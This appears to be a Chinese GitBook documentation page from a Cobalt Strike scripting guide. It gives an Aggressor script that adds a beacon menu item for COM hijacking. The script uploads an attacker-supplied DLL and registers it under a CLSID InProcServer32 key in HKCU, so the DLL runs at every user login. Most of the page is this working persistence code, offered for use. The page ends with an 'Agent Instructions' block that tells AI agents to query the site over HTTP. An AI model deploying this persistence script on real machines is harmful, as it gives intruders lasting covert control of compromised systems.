# COM劫持利用脚本编写 一个简单的通过com劫持达到持久化的一个脚本 ``` sub Show_COM_GUI{ $bid = $1; $dialog = dialog("COM劫持用户登陆", %(), lambda({ bupload($bid, $3['file']); bmv($bid,$3['DLL_NAME'],$3['DLL_PATH']) bpowerpick($bid,'Remove-Item "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}" -Recurse'); bpowerpick($bid,'New-Item -Type Directory "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}"'); #brun($bid,"reg add \"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32\" /t REG_SZ /d \"".$3['DLL_PATH'].$3['DLL_NAME']"\" /f") bpowerpick($bid,"New-Item -itemType String 'HKCU:\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32' -Value \"".$3['DLL_PATH'].$3['DLL_NAME']"\" "); bpowerpick($bid,'Set-ItemProperty "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}\InProcServer32" -name ThreadingModel -value Both'); })); dialog_description($dialog, "劫持任意用户登陆,任意用户登陆时将触发DLL. x64位用x64 dll,x86位用x86 dll。清除劫持:Remove-Item \"HKCU:\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\\" -Recurse"); drow_file($dialog, "file", "本地DLL路径: "); drow_text($dialog, "DLL_NAME", "DLL文件名: "); drow_text($dialog, "DLL_PATH", "上传路径+DLL文件名: "); dbutton_action($dialog, "Go"); dialog_show($dialog); } popup beacon_bottom { item "&COM持久化" { local('$bid'); foreach $bid ($1) { Show_COM_GUI($bid); } } } ``` 通过com劫持任意用户登陆达到持久化,每当有用户登陆时就会触发dll。x32位系统使用x32位dll,x64位用x64位dll。 --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://wbglil.gitbook.io/cobalt-strike/cobalt-strikejiao-ben-bian-xie/comjie-chi-li-yong-jiao-ben-bian-xie.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.